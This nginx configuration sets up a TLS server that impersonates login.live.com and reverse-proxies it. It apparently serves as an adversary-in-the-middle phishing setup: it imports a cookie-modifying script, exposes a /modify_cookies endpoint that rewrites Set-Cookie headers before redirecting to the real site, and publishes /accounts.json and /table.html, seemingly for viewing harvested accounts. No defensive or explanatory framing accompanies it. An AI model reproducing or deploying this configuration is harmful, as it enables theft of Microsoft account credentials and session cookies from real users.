load_module /usr/lib/nginx/modules/ngx_http_js_module.so;

events {

}

http {
  js_path /etc/nginx/;

  js_import main from modify_set_cookie.js;

  server {
    listen 443 ssl;
	server_name login.live.com;
	ssl_certificate certs/server.crt;
	ssl_certificate_key certs/server.key;

	proxy_busy_buffers_size   512k;
	proxy_buffers		4 512k;
	proxy_buffer_size	  256k;

	location / {
        proxy_pass https://login.live.com;
        proxy_pass_request_headers      on;
    }
	location /favicon.ico {
	    alias /var/www/favicon.ico;
	}
	location /accounts.json {
	    alias /var/www/accounts.json;
	}
	location /table.html {
	    alias /var/www/table.html;
	}
	location /style.css {
	    alias /var/www/style.css;
	}
	location /satisfontory.woff {
	    alias /var/www/satisfontory.woff;
	}
    location /modify_cookies {
        js_header_filter main.setCookie;
	return 302 https://login.live.com;
    }
  }
}